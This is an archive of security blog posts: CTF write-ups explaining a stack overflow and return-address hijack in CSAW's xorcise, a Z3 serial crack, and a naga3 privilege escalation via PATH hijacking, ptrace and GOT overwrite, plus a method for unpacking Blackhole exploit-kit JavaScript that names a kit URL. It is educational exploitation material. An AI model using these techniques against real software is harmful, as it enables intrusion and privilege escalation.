Sunday, September 21, 2014

CSAW 2014 Exploit 500 writeup : xorcise

The CSAW 2014 Exploit500 challenge was a Linux 32-bit network service for which the executable and the source code were provided (I saved a copy of the source code here). The service accepts packets defined by the structure cipher_data and first applies a decryption loop to the received data.

struct cipher_data
{
    uint8_t length;
    uint8_t key[8];
    uint8_t bytes[128];
};
typedef struct cipher_data cipher_data;

The service provides multiple commands, but the 2 interesting ones, read_file and system, require your packet to be authenticated. The authentication check is done in is_authenticated(), which computes an authentication checksum based on a password read from the local file 'password.txt'. This check does not seem to be vulnerable.

My teammate EiNSTeiN_ discovered that there is a flaw in the decipher() function that does the decryption of the data. The function allocates a buffer buf which will contain the decrypted data; the allocated size is MAX_BLOCKS * BLOCK_SIZE, which is 128 bytes. The copy of the packet bytes to the buffer is done safely with memcpy.

#define BLOCK_SIZE 8
#define MAX_BLOCKS 16
[...]
memcpy(buf, data->bytes, sizeof(buf));

There is also a check to ensure that the decryption loop does not process more than the size of the buffer buf[].

    if ((data->length / BLOCK_SIZE) > MAX_BLOCKS)
    {
        data->length = BLOCK_SIZE * MAX_BLOCKS;
    }

But this check is flawed: we can pass a length of 135, which passes the check (with integer division 135 / 8 equals 16, which is not bigger than MAX_BLOCKS). The decryption loop works on blocks of 8 bytes, so the last iteration (loop = 128) applies it to 8 bytes outside of buf[].

    for (loop = 0; loop < data->length; loop += 8)
    {
        for (block_index = 0; block_index < 8; ++block_index)
        {
            buf[loop+block_index]^=(xor_mask^data->key[block_index]);
        }
    }
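To see why 135 slips through, here is a small Python model of the check and of the loop bounds. It is only a sketch: clamp_length and touched_offsets are names made up for illustration, and Python's // stands in for C's integer division.

```python
BLOCK_SIZE = 8
MAX_BLOCKS = 16
BUF_SIZE = BLOCK_SIZE * MAX_BLOCKS  # 128 bytes, the size of buf[]


def clamp_length(length):
    """Model of the length check in decipher() (C integer division)."""
    if length // BLOCK_SIZE > MAX_BLOCKS:
        return BLOCK_SIZE * MAX_BLOCKS
    return length


def touched_offsets(length):
    """Offsets into buf[] that the decryption loop XORs for a given length."""
    length = clamp_length(length)
    return [loop + block_index
            for loop in range(0, length, BLOCK_SIZE)
            for block_index in range(BLOCK_SIZE)]


# Every offset >= 128 lies past the end of buf[].
overflow = [off for off in touched_offsets(135) if off >= BUF_SIZE]
print(overflow)
```

Any length from 129 to 135 behaves the same way, while 136 and above is clamped back to 128 and stays inside the buffer.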

If we look at the stack layout of decipher() we see that those 8 bytes are the variables xor_mask, block_index and the first 3 bytes of loop.

-00000095 buf             db 128 dup(?)
-00000015 xor_mask        db ?
-00000014 block_index     dd ?
-00000010 loop            dd ?

The strategy I went for is to modify the value of loop so that buf[loop+block_index] points at the return address of decipher(), then modify its first 2 bytes to make it return somewhere else. Hopefully we can find an interesting place to jump to.

Let's go through the modification of the bytes one at a time. The first one is xor_mask. At this point block_index equals 0. We know 2 of the values in the decryption (xor_mask = 0x8F and buf[loop+block_index] = 0x8F), so we can choose key[block_index] to get the output value we want. Let's set xor_mask to 0 to make the next steps easier: 0x8F ^ 0x8F ^ 0x00 equals 0x00, so this is the value we will put in key[0].

variable       : prev_val   block_index  new_val key_value
xor_mask       : 0x8F       0            0x00    key[0] = 0x00

Next up is the first byte of block_index, which at this point is equal to 1. We will keep its value at 1 so the decryption loop continues normally. As we have set xor_mask to 0x00, the computation is now 0x01 ^ 0x01 ^ 0x00, which equals 0x00, so we put this value in key[1]. We will also leave the other bytes of block_index unchanged. Here is the status of our table so far :

variable       : prev_val   block_index  new_val key_value
xor_mask       : 0x8F       0            0x00    key[0] = 0x00
block_index[0] : 0x01       1            0x01    key[1] = 0x00
block_index[1] : 0x00       2            0x00    key[2] = 0x00
block_index[2] : 0x00       3            0x00    key[3] = 0x00
block_index[3] : 0x00       4            0x00    key[4] = 0x00

We can now modify the first byte of loop. Its current value is 0x80 (128), and the value we need to make buf[loop+block_index] reach the return address at this point is 0x93, so that gives us key[5] = 0x80 ^ 0x93 = 0x13.

variable       : prev_val   block_index  new_val key_value  
loop[0]        : 0x80       5            0x93    key[5] = 0x13 
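The rule used for each row can be written as a one-line helper. This is a sketch, not part of the original exploit: key_byte is a hypothetical name, and it simply inverts the statement buf[i] ^= (xor_mask ^ key[block_index]).

```python
def key_byte(prev_val, new_val, xor_mask):
    """Key byte that turns prev_val into new_val when the loop computes
    buf[i] ^= (xor_mask ^ key[block_index])."""
    return prev_val ^ new_val ^ xor_mask


# xor_mask is still 0x8F at the moment it overwrites itself.
print(hex(key_byte(0x8F, 0x00, 0x8F)))  # key[0]
# From then on xor_mask is 0x00.
print(hex(key_byte(0x01, 0x01, 0x00)))  # key[1], block_index[0] stays 1
print(hex(key_byte(0x80, 0x93, 0x00)))  # key[5], loop[0] becomes 0x93
```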

We are now able to modify the return address of decipher(), so we're making good progress. Where do we want to make the program jump? There is a call to read_file() in process_connection(). This command reads the content of a file and sends it back to us, so we could use it to read the content of 'password.txt'.

.text:08049279                 mov     eax, [ebp+var_10]
.text:0804927C                 add     eax, 8
.text:0804927F                 sub     esp, 8
.text:08049282                 push    eax
.text:08049283                 push    offset aReadFileReques ; "Read File Request: %s\n"
.text:08049288                 call    _printf
.text:0804928D                 add     esp, 10h
.text:08049290                 mov     eax, [ebp+var_10]
.text:08049293                 add     eax, 8
.text:08049296                 sub     esp, 8
.text:08049299                 push    eax             ; filename
.text:0804929A                 push    [ebp+fd]        ; fd
.text:0804929D                 call    read_file

There is a little detail to keep in mind: there is a stack adjustment after the call to decipher(), and as we are hijacking the return address the stack will not be properly readjusted.

.text:0804918F                 call    decipher
.text:08049194                 add     esp, 10h
;274     packet = (request *)&decrypted;
.text:08049197                 lea     eax, [ebp+var_11D]

.text:0804919D                 mov     [ebp+var_10], eax

My first thought was to jump to 0804928D, which does the same stack adjustment and then sets the correct parameters for the call to read_file(). However this approach does not work, as the value of var_10 is set only after the call to decipher(). Bummer.

I then noticed that the address of filename is passed via eax at 0x08049299 and it happens that at the end of decipher() eax points inside buf[]. So the last thing I needed to do was to adjust the initial packet content so that it contained 'password.txt\x00' XOR 0x8F XOR the key. Here is the final content of the variable smashing table.

variable       : prev_val   block_index  new_val key_value    
xor_mask       : 0x8F       0            0x00    key[0] = 0x00        
block_index[0] : 0x01       1            0x01    key[1] = 0x00 
block_index[1] : 0x00       2            0x00    key[2] = 0x00
block_index[2] : 0x00       3            0x00    key[3] = 0x00
block_index[3] : 0x00       4            0x00    key[4] = 0x00
loop[0]        : 0x80       5            0x93    key[5] = 0x13
at this point buf[loop+block_index] overwrites retaddr

retaddr[0]     : 0x94       6            0x99    key[6] = 0x0d
retaddr[1]     : 0x91       7            0x92    key[7] = 0x03
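The whole table can be checked with a small simulation. This is a sketch under several assumptions, not the original exploit: the frame is modeled as a flat byte array using the offsets from the stack layout above (return address at ebp+4), the locals are re-read from the stack on every iteration as the writeup implies, and the file name is placed at offset 0 of buf[] even though the text only says eax points somewhere inside buf[]. The names encode and run_decipher are made up for illustration.

```python
import struct

# Offsets relative to the start of buf[] (buf is at ebp-0x95).
BUF, XOR_MASK, BLOCK_INDEX, LOOP, RETADDR = 0x00, 0x80, 0x81, 0x85, 0x99
KEY = [0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x0D, 0x03]
LENGTH = 135


def encode(plain, key, mask=0x8F):
    """Pre-XOR bytes so that the decryption loop turns them back into plain."""
    return bytes(b ^ mask ^ key[i % 8] for i, b in enumerate(plain))


def run_decipher(packet_bytes, key, length):
    """Replay the decryption loop on a flat model of decipher()'s frame."""
    mem = bytearray(RETADDR + 4)
    mem[BUF:BUF + 128] = packet_bytes.ljust(128, b"\x00")[:128]
    mem[XOR_MASK] = 0x8F
    struct.pack_into("<I", mem, RETADDR, 0x08049194)  # normal return address

    def rd(off):
        return struct.unpack_from("<I", mem, off)[0]

    def wr(off, val):
        struct.pack_into("<I", mem, off, val & 0xFFFFFFFF)

    wr(LOOP, 0)
    while rd(LOOP) < length:
        wr(BLOCK_INDEX, 0)
        while rd(BLOCK_INDEX) < 8:
            block_index = rd(BLOCK_INDEX)
            mem[rd(LOOP) + block_index] ^= mem[XOR_MASK] ^ key[block_index]
            wr(BLOCK_INDEX, rd(BLOCK_INDEX) + 1)
        wr(LOOP, rd(LOOP) + 8)
    return mem, rd(RETADDR)


mem, retaddr = run_decipher(encode(b"password.txt\x00", KEY), KEY, LENGTH)
print(hex(retaddr))      # the hijacked return address
print(bytes(mem[:13]))   # what buf[] starts with after decryption
```

In this model the return address ends up at 0x08049299, the push eax just before the call to read_file(), and buf[] starts with the NUL-terminated file name.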

Below is the source code of my exploit. I used the pwntools Python library by Gallopsled, which saved me a ton of time on other challenges; definitely check it out.

And finally the exploit in action :

[ekse@xubuntu] : ~/csaw/exploit500 $ python client.py 
[+] Opening connection to 127.0.0.1 on port 24001: OK
[*] Switching to interactive mode
pass123
[*] Got EOF while reading in interactive

So the password was 'pass123'. It was kind of depressing to have worked so much for such a weaksauce password; the CSAW CTF organizers really are a bunch of trolls. Now we could implement the packet authentication and call the system command to list the files on the server, but I guessed the flag was probably in 'flag.txt' and used the exploit to read that file instead :-)

The flag was flag{code_exec>=crypto_break}.

Thanks to drraid for this great challenge and to the CSAW organizers for such a great CTF!

Sunday, August 10, 2014

Solving picoCTF 2013 Harder Serial with Z3

In the past weeks I have been watching LiveCTF, a project to livestream speedruns of wargames and CTF challenges. This is a great learning tool as you get to see the thought process of the caster as well as the tools and tricks they use to solve the challenges. 

I also recently learned about picoCTF, a capture the flag game made for high school teams and organized by PPP. I have been playing the 2013 edition for the last few days and it is really well made; for someone new to CTF I would definitely recommend starting with this one. It also has interesting challenges even for seasoned CTF players. You can play the 2013 edition by registering here.

I decided to try to speedrun picoCTF and focus on optimizing my work process when going through the challenges. In this post I will show how to solve the 'Harder Serial' challenge using Z3.



The challenge
Harder Serial comes in the form of a Python script; we need to find a working serial for the RoboCorpIntergalactic software. The full script code is below.

As we can see, the program expects a 20-digit serial, and the check_serial() function checks a number of conditions on the values of the digits with simple operations. It can probably be solved by hand but it is a perfect use case for Z3. In short, Z3 is an open-source theorem prover that allows us to define conditions to be met and will output whether the conditions are satisfiable, as well as a set of values that meet all those conditions. The inner workings of Z3 and SMT solvers are a complex topic but Z3 itself is actually easy to use.

I will now go through my solution code; if you prefer to see the full script you can find it here. Z3 uses its own syntax but luckily there are Python bindings which make it easy to define the conditions. We start by importing z3 and defining integer variables for the serial digits.

Then we create an instance of the solver and add our conditions to it. The first set of conditions defines the serial digits as values between 0 and 9.

Then we add the conditions from the check_serial() function. To save time I used a couple of search and replace passes in a text editor to avoid typing them manually.

We add a condition to make s[3] different from zero because one of the conditions divides by it: Z3 will accept 0 as a valid value but Python will throw an exception. Finally we call solver.check(), which determines whether the conditions can be satisfied, and solver.model(), which returns a set of values that meet those conditions.

>python break_serial.py
solving...
sat
[s[8] = 5,
 s[4] = 3,
 s[19] = 2,
 s[17] = 8,
 s[16] = 8,
 s[2] = 8,
 s[9] = 7,
 s[1] = 2,
 s[3] = 1,
 s[15] = 7,
 s[11] = 0,
 s[10] = 9,
 s[12] = 3,
 s[18] = 1,
 s[0] = 4,
 s[14] = 5,
 s[7] = 4,
 s[6] = 2,
 s[5] = 7,
 s[13] = 9]

Again with a bit of search/replace and some Python we can get our serial.
>>> s = [0] * 20
>>> s[8] = 5
>>> s[4] = 3
>>> s[19] = 2
>>> s[17] = 8
>>> s[16] = 8
>>> s[2] = 8
>>> s[9] = 7
>>> s[1] = 2
>>> s[3] = 1
>>> s[15] = 7
>>> s[11] = 0
>>> s[10] = 9
>>> s[12] = 3
>>> s[18] = 1
>>> s[0] = 4
>>> s[14] = 5
>>> s[7] = 4
>>> s[6] = 2
>>> s[5] = 7
>>> s[13] = 9
>>> "".join([str(x) for x in s])
'42813724579039578812'
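The search/replace step can also be scripted. The sketch below parses the printed model with a regular expression instead of editing it by hand; serial_from_model is a hypothetical helper, and it assumes the model is printed in the "s[index] = value" form shown above.

```python
import re

MODEL_OUTPUT = """[s[8] = 5,
 s[4] = 3,
 s[19] = 2,
 s[17] = 8,
 s[16] = 8,
 s[2] = 8,
 s[9] = 7,
 s[1] = 2,
 s[3] = 1,
 s[15] = 7,
 s[11] = 0,
 s[10] = 9,
 s[12] = 3,
 s[18] = 1,
 s[0] = 4,
 s[14] = 5,
 s[7] = 4,
 s[6] = 2,
 s[5] = 7,
 s[13] = 9]"""


def serial_from_model(text, length=20):
    """Rebuild the serial string from lines of the form 's[i] = d'."""
    digits = [None] * length
    for index, value in re.findall(r"s\[(\d+)\] = (\d+)", text):
        digits[int(index)] = value
    if None in digits:
        raise ValueError("model does not assign every digit")
    return "".join(digits)


print(serial_from_model(MODEL_OUTPUT))
```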

We validate that our key is accepted :

> python harder_serial.py 42813724579039578812
Please enter a valid serial number from your RoboCorpIntergalactic purchase
#>42813724579039578812<#

Thank you! Your product has been verified!


This was a rather simple use of Z3, for examples of advanced use of Z3 for reverse engineering see the following articles:

Breaking Kryptonite's Obfuscation: A Static Analysis Approach Relying on Symbolic Execution by Axel Souchet and
Concolic execution - Taint analysis with Valgrind and constraints path solver with Z3 by Jonathan Salwan.

As always feel free to leave a comment or send me a message on Twitter if you have questions or comments!

Wednesday, June 19, 2013

Writeup for naga3 @ NoSuchCon CTF 2013

This is a writeup for the naga3 challenge that was part of the NoSuchCon 2013 CTF. I picked this challenge for the Montréhack session I was hosting this month as I found it quite interesting and a bit different than the challenges I did in the past. Montréhack is an informal group that gathers every month to practice CTF challenges and the solution is presented at the end; if you live in the Montreal area feel free to drop by, it's a lot of fun and a great way to learn. For the purpose of this article I will use the challenge environment I recreated for the event, the paths are different than on the CTF server but I used the original binary.

The challenges are accessible at OverTheWire so if you want to try it by yourself first you should stop reading now.

The original description of the challenge was "To monitor local system performance, a tool was developed to take some timing measurements by executing some commands." The first step was to find the binary. Searching for files owned by naga3 shows a program called rtv. rtv is SUID on user naga3. (To simplify things, I put the program and source code directly in /home/level2/ on my VM for Montréhack.)


naga2@naga:/$ find . -user naga3

./usr/lib/rtv.c
./usr/lib/rtv

We now have access to the binary and the source code of the program. As rtv.c is actually quite short, I reproduce it here.


Review of rtv.c


Let's examine the main() function first. We see that a pipe is created [1], then a child process is created with fork [2]. In the child process, the SETUID privileges are dropped [3] and then the process is made debuggable with ptrace via the call to prctl(PR_SET_PTRACER) [4]. Finally, we see that the parent and child processes execute functions that have to do with "measurements" and each uses one side of the pipe [5]. We can assume that information will be passed between both processes.

Figure 1 - main function of rtv

The call to prctl() with PR_SET_PTRACER has a big impact here. Ptrace allows us to read and modify memory of the process, set breakpoints and modify register values (including EIP). The end result is that the code of the child is now irrelevant, we can replace it with whatever we want. This is something we will put to use later on.

Systematic failure


We then inspect the functions that are called in the child process. The first one is make_measurements(). This function iterates over the entries defined in the Measurements table [1] (see Figure 3). This table contains measurement_t structures which contain commands. Those commands are executed via system() [2], with the output redirected to /dev/null. Finally the function stores the execution time of the commands in the runtime member of the structure in the Measurements table.

Figure 2 - vulnerable call to system() in make_measurements


Figure 3 - The Measurements table

As we can see, the commands that are called are defined with relative paths. This is a classic vulnerability on UNIX systems. To exploit this, we simply need to modify the PATH environment variable to add a folder that we control at the beginning and create an executable file (a shell script works just fine) for one of the commands in it (for example env in this case). The result will be that our executable will be called instead of the intended one.
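The lookup order can be illustrated without touching rtv at all. The sketch below uses Python's shutil.which as a stand-in for the PATH search done by the shell that system() spawns; the temporary directory and the fake env script are purely illustrative, and a POSIX system is assumed.

```python
import os
import shutil
import stat
import tempfile


def resolve_with_hijack(command, attacker_dir):
    """Return the path a PATH lookup picks when attacker_dir is listed first."""
    search_path = attacker_dir + os.pathsep + os.environ.get("PATH", os.defpath)
    return shutil.which(command, path=search_path)


with tempfile.TemporaryDirectory() as attacker_dir:
    # Drop an executable named like one of the commands run by rtv.
    fake_env = os.path.join(attacker_dir, "env")
    with open(fake_env, "w") as script:
        script.write("#!/bin/sh\necho hijacked\n")
    os.chmod(fake_env, stat.S_IRWXU)

    resolved = resolve_with_hijack("env", attacker_dir)
    print(resolved)  # our script, not the system's env
```

Because the first matching directory wins, prepending a directory we control is enough to shadow any command that is invoked without an absolute path.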

However, in this case this is not sufficient to read the flag. As the calls to system() are made by the child process, the SETUID privileges have already been dropped by then. It does however allow us to easily retrieve the pid of the child process as it is put in the PARENTPID variable when the commands are called. This will be of great importance in the next part. (Note : on the original CTF server, /proc/ was disabled, probably to avoid snooping between competitors. The PARENTPID variable was thus needed).

Let's talk


The last part of the program is where the child process returns the measurement data to the parent process, which in turn prints it to the standard output via print_measurements().

We see that report_measurements() iterates over the Measurements table with a for loop and writes 1) i, the index in the table and 2) runtime, the execution time of the executed command.

Figure 4 - report_measurements() in the child process
The same thing is done in read_measurements() in the parent process, however it is done slightly differently. The function enters a while loop and reads the data provided in the pipe; if the size of a read doesn't correspond to the expected size the program stops execution there [1]. The runtime information is then written in the Measurements table of the parent process, and the loop ends when i is equal to the last index of the table (measurementCount - 1).

Normally this would be fine if we expect the child to behave correctly. However, due to our ability to use ptrace on the child process and modify the data written in the pipe, we can cause a write outside of the Measurements table [2]. We control 8 bytes at every write, and since we also control i we can make as many writes as we want.

Figure 5 - read_measurements() in the parent process


Arbitrary write? not quite


We now know that we can cause memory overwrites in the address space of the parent process. But where exactly can we write? Figure 6 shows the assembly code from IDA corresponding to the Measurements[i].runtime = t; statement in read_measurements(). 0x0804A100 is the address of the first runtime entry in the Measurements table. Then i is multiplied by 0x88, which is the size of the measurement_t structure (128 bytes for cmd + 8 bytes for runtime).

Figure 6 - Memory overwrites in read_measurements()
The multiplication is somewhat obscured as it is optimized with shift-left instructions; each shift by one bit multiplies by 2.

shl eax,   3; eax = i * 8
mov ebx, eax; ebx = i * 8 
shl ebx,   4; ebx = i * 8 * 16 = i * 128
add eax, ebx; eax = i * 8 + i * 128 = i * 136 (136 equals 0x88)


The write address can be determined with the following formula :

       writeAddr = 0x804A100 + i * 0x88
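The shift-and-add sequence and the 32-bit wrap-around can be replayed in Python. This is a sketch: scaled_index and write_addr are illustrative names, and the masking with 0xFFFFFFFF models the 32-bit registers.

```python
BASE = 0x0804A100   # address of the first runtime entry (from the text)
MASK32 = 0xFFFFFFFF


def scaled_index(i):
    """i * 0x88 computed the way the compiler does it, on 32-bit registers."""
    eax = (i << 3) & MASK32      # shl eax, 3   -> i * 8
    ebx = (eax << 4) & MASK32    # shl ebx, 4   -> i * 128
    return (eax + ebx) & MASK32  # add eax, ebx -> i * 136


def write_addr(i):
    """Address written by Measurements[i].runtime = t, with 32-bit wrap."""
    return (BASE + scaled_index(i)) & MASK32


print(hex(scaled_index(1)))
print(hex(write_addr(-1)))
print(hex(write_addr(0x03C3C3C2)))
```

Negative or very large values of i simply wrap around, which is what makes addresses below the table reachable.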

If you are lucky enough to have a license for it, Hexrays Decompiler actually provides the formula directly.

Figure 7 - writeAddr formula in Hexrays Decompiler

We now need to find one or more memory addresses to overwrite to hijack the control flow of the program. The GOT (Global Offset Table) is usually a good candidate. It can be dumped with the command objdump -R rtv.


level2@montrehack:~$ objdump -R rtv

rtv:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049ffc R_386_GLOB_DAT    __gmon_start__
0804a32c R_386_COPY        stderr
0804a00c R_386_JUMP_SLOT   setresuid
0804a010 R_386_JUMP_SLOT   read
0804a014 R_386_JUMP_SLOT   printf
0804a018 R_386_JUMP_SLOT   gettimeofday
0804a01c R_386_JUMP_SLOT   __stack_chk_fail
0804a020 R_386_JUMP_SLOT   getuid
0804a024 R_386_JUMP_SLOT   perror
0804a028 R_386_JUMP_SLOT   fwrite
0804a02c R_386_JUMP_SLOT   getpid
0804a030 R_386_JUMP_SLOT   puts
0804a034 R_386_JUMP_SLOT   system
0804a038 R_386_JUMP_SLOT   __gmon_start__
0804a03c R_386_JUMP_SLOT   exit
0804a040 R_386_JUMP_SLOT   __libc_start_main
0804a044 R_386_JUMP_SLOT   write
0804a048 R_386_JUMP_SLOT   getgid
0804a04c R_386_JUMP_SLOT   prctl
0804a050 R_386_JUMP_SLOT   pipe
0804a054 R_386_JUMP_SLOT   fork
0804a058 R_386_JUMP_SLOT   sprintf
0804a05c R_386_JUMP_SLOT   setresgid

Inspecting the code of the program reveals that the functions read, printf and exit might be called after the memory corruption, so being able to overwrite the entry of one of those should allow us to redirect execution.

A naive approach would be to calculate the write addresses for each value of i. This can be done with the following script :



While this approach will find a result, it is very slow. A better approach is to take into account the fact that the value of writeAddr grows by 0x88 each time i is increased. We can bring writeAddr back around the area of the address we are targeting by increasing i so that it wraps around the 32-bit address space. To obtain this value, we divide 0xFFFFFFFF by 0x88, which gives us 31 580 641. Then it's just a matter of adjusting i upward or downward until we are within 0x88 bytes of our target address. We have now saved 31 580 640 useless computations, that's a nice optimization :-)

The script actually executes instantly, provided that our target address is near the base address 0x0804A100 which is the case for the GOT. Here is a part of the output for read.

ekse@montrehack:~/level2$ python map_address.py
i = -0000001 writeaddr =  0804a078 diff = 104
i = 01e1e1e1 writeaddr =  0804a088 diff = 120
i = 03c3c3c2 writeaddr =  0804a010 diff = 0
i = 05a5a5a3 writeaddr =  08049f98 diff = 120
i = 07878785 writeaddr =  08049fa8 diff = 104
i = 09696967 writeaddr =  08049fb8 diff = 88
i = 0b4b4b49 writeaddr =  08049fc8 diff = 72
i = 0d2d2d2b writeaddr =  08049fd8 diff = 56
i = 0f0f0f0d writeaddr =  08049fe8 diff = 40
i = 10f0f0ef writeaddr =  08049ff8 diff = 24
i = 12d2d2d1 writeaddr =  0804a008 diff = 8
i = 14b4b4b2 writeaddr =  08049f90 diff = 128
i = 16969694 writeaddr =  08049fa0 diff = 112
i = 18787876 writeaddr =  08049fb0 diff = 96
i = 1a5a5a58 writeaddr =  08049fc0 diff = 80
i = 1c3c3c3a writeaddr =  08049fd0 diff = 64
i = 1e1e1e1c writeaddr =  08049fe0 diff = 48
i = 1ffffffe writeaddr =  08049ff0 diff = 32
i = 21e1e1e0 writeaddr =  0804a000 diff = 16
i = 23c3c3c1 writeaddr =  08049f88 diff = 136
i = 25a5a5a3 writeaddr =  08049f98 diff = 120
i = 27878785 writeaddr =  08049fa8 diff = 104
i = 29696967 writeaddr =  08049fb8 diff = 88
i = 2b4b4b49 writeaddr =  08049fc8 diff = 72
i = 2d2d2d2b writeaddr =  08049fd8 diff = 56
i = 2f0f0f0d writeaddr =  08049fe8 diff = 40
i = 30f0f0ef writeaddr =  08049ff8 diff = 24
....

We can see that by using an i value of 03c3c3c2 we are able to overwrite read directly.
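As a cross-check, the exact index can also be computed directly instead of searched for. This is a different technique from the script above: it solves 0x88 * i = target - base modulo 2^32 with a modular inverse. The sketch assumes Python 3.8 or later for pow(17, -1, m), and index_for is a made-up name.

```python
BASE = 0x0804A100
ENTRY_SIZE = 0x88
MOD = 1 << 32


def write_addr(i):
    """Address written for index i, wrapped to 32 bits."""
    return (BASE + i * ENTRY_SIZE) % MOD


def index_for(target):
    """Smallest non-negative i with write_addr(i) == target, or None."""
    delta = (target - BASE) % MOD
    if delta % 8:
        # 0x88 = 8 * 17, so only offsets that are multiples of 8 are reachable.
        return None
    inv17 = pow(17, -1, MOD // 8)  # 17 is odd, hence invertible mod 2**29
    return (delta // 8) * inv17 % (MOD // 8)


i = index_for(0x0804A010)  # GOT slot of read
print(hex(i), hex(write_addr(i)))
```

The result agrees with the value found in the listing. Slots that are not reachable exactly, such as 0x0804a014, make the function return None; they can only be covered by the 8-byte write that starts at the preceding reachable address.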


rtvtrace.py - ptrace to my heart


I wrote a script using python-ptrace to modify the values of i and runtime that are sent in the pipe by the child process. To go faster, I actually used the Gdb implementation provided with the library, which makes it easy to create breakpoints and modify memory and register values.

The code is actually quite simple. It sets 2 breakpoints, one before the write of i in the pipe and the second before the write of runtime. In each case eax points to the data that will be written, so we simply point it to another address holding our own data. Note that in this debugger breakpoints are removed after being hit, so they will be triggered only for the first command. To test that it works, we overwrite the address of read in the GOT with the bytes 0x41 0x42 0x43 0x44 ("ABCD"), which read back as the little-endian value 0x44434241.

The setup of our exploit will be as follows :

  1. Create an env script that writes PARENTPID to a file named "pid"
  2. run PATH=.:$PATH rtv
  3. run rtvtrace.py and attach to the child process

Here is the output of rtvtrace.py when executed.


ekse@montrehack:~/level2/$ ./run_rtvtrace.sh
Waiting for pid...
Switch to
[!] attached to 1188
New breakpoint:
New breakpoint:
------------------------------------------------------------
PID: 1188
Signal: SIGCHLD
Child process 1191 exited normally
Signal sent by user 1000
------------------------------------------------------------
interrupted by SIGCHLD
EIP: 0xb775d424L
Send SIGCHLD to
------------------------------------------------------------
PID: 1188
Signal: SIGCHLD
Child process 1199 exited normally
Signal sent by user 1000
------------------------------------------------------------
interrupted by SIGCHLD
EIP: 0xb775d424L
Send SIGCHLD to
------------------------------------------------------------
PID: 1188
Signal: SIGCHLD
Child process 1201 exited normally
Signal sent by user 1000
------------------------------------------------------------
interrupted by SIGCHLD
EIP: 0xb775d424L
Send SIGCHLD to
------------------------------------------------------------
PID: 1188
Signal: SIGCHLD
Child process 1203 exited normally
Signal sent by user 1000
------------------------------------------------------------
interrupted by SIGCHLD
EIP: 0xb775d424L
Send SIGCHLD to
Stopped at
EIP: 0x80487d6L
Current id loc: 0xbff5295cL value : (0,)
Changing data location for write of id...
Stopped at
EIP: 0x8048802L
Process 1188 exited normally
Unhandled exception : None

And sure enough, when running rtv in GDB execution ends up at 0x44434241.

ekse@montrehack:~/level2/exploit_1$ ./run_level2.sh

(gdb) run
Starting program: /home/level2/rtv
Command runtime verification tool v1.0
Please wait while command runtimes are being verified...

Program received signal SIGSEGV, Segmentation fault.
0x44434241 in ?? ()

(gdb) bt
#0  0x44434241 in ?? ()
#1  0x080489d5 in read_measurements ()
#2  0x08048bdc in main ()

Where do we put our shellcode?

We now have control of the execution of the parent process. The last thing we need to do is to figure out where to put our shellcode and jump to it. A technique that is often used in this kind of challenge is to put the shellcode in an environment variable, prepend a large nopsled in front of it and jump somewhere in it. However this approach does not work as the stack is non-executable, which we can confirm with execstack.

ekse@montrehack:~/level2/exploit_1$ execstack /home/level2/rtv
- /home/level2/rtv

If we look at the output of the map_address.py script, we see that we can have multiple consecutive writes of 8 bytes, so we should probably be able to write a short shellcode somewhere. The problem we are facing is that none of the memory sections of rtv is both writable and executable.

Figure 8 - Permissions of the memory segments of rtv


Another approach would be to use a ROP payload to set the memory region where we put our shellcode executable, but that is somewhat complicated and I'm lazy so I kept looking for an easier way. I reviewed what could be overwritten in the memory and thought about the commands in the Measurements table. We could probably overwrite one of the commands and have it execute what we want, but that doesn't work either as it's the commands in the child address space that are executed... and then it all became clear.


All we need to do is to redirect execution to make_measurements() so that it is executed in the parent process. This way we can use another command that is called by system() (I used md5sum) to copy the flag. The final setup of our exploit is like this :


  1. env is a script that writes PARENTPID to the file "pid"
  2. md5sum is a script that copies the flag to the file "flag"
  3. run PATH=.:$PATH rtv
  4. attach to the child process with rtvtrace.py
  5. Overwrite the address of the read() function in the GOT with the address of make_measurements()
  6. md5sum is called by the parent process, we win.

You can find the code of the exploit and the scripts I presented on my github repository. The slides I made for Montréhack are also available.

Conclusion

This challenge required the use of 3 different vulnerabilities of the program. Each of those taken separately was not sufficient to exploit the program. This is something that is often needed today to bypass modern protection mechanisms, for example one of the winners of Pwn2Own last year used 6 vulnerabilities to exploit Google Chrome.

As I write these lines, I just learned about a new vulnerability in FreeBSD that was disclosed today and that involves ptrace and mmap. While the context is completely different, it's funny to see that the exploit code is actually simpler than what we had to do =) 

If you have questions or would like something to be clarified in the post, feel free to email me at ekse.0x@gmail.com. Happy hacking!




Friday, May 3, 2013

Unpacking exploit kits with Fiddler

Most exploit kits use javascript packing to avoid the code appearing in plain text. Figure 1 shows an example of such a packed script. Multiple techniques and tools exist to help in the task of unpacking and analyzing these kits, for example Kahu Security has many articles on his blog about this. This post presents a quick and dirty method I have been using a lot recently; it uses Fiddler and its AutoResponder feature. The idea is to modify the Javascript code and then replay the HTTP traffic in the browser. If you want to try this technique, here is the Fiddler HTTP archive I used as an example (archive password is "infected").

Figure 1 Packed Blackhole Exploit kit
The first step involves capturing the kit with Fiddler. Then activate the AutoResponder feature as shown in Figure 2. Next drag the sessions corresponding to the kit traffic into the AutoResponder panel. In this example this is the first session.

Figure 2 Enabling AutoResponder
Next edit the session, you can use the context menu or just press Enter.


Figure 3 Editing the response

Now I want to modify the script to be able to see the unpacked code, so I open the Syntax View tab. This part is different from one pack to another and you might need multiple attempts to figure out the best way to do it. In this example the pack is Blackhole, and there is an eval statement at the very end that executes the script after it is unpacked. I use console.log to get the content, so I replace w(c) by console.log(c) and hit Save.

Figure 4 Deciding what to modify

Next I open Google Chrome (make sure it is configured to use Fiddler as a proxy), open the Developer Console with F12 and click on the Console tab. I then browse to the pack URL, in this example http://energirans.net/main.php?page=598991e7306ac07e (you can use Ctrl+U to copy the URL from a session). If all went well the unpacked code should appear in the logs.

Figure 5 unpacked script in the logs
Another neat feature of Fiddler is the code beautifier. I copy the script from the log, replace the original script in the SyntaxView and click on Format Script/JSON. The code is now well formatted and ready for analysis. You can find the unpacked code here. Note that this is an old version of Blackhole v1 from February 2012 but the technique still works today.

Figure 6 Format Javascript code


Figure 7 Formatted Blackhole code

This is a quick and dirty technique and could easily be defeated, but it works with many packs. If you have any questions, leave a comment or email me at ekse.0x@gmail.com.








Wednesday, March 30, 2011

Honeynet Workshop 2011

Note : This is a cross-post from the Corelan Team blog.

Introduction

On March 21st I was in Paris for the annual Honeynet Workshop. For the first time this year there was a conference day accessible to the general public. Moreover, I didn't have to pay the registration fee since I successfully completed one of the Honeynet Forensics challenges. The day was split into 4 sessions and had talks covering the Honeynet projects, malware, and ethical and legal considerations of tracking botnets and eventual take-downs.

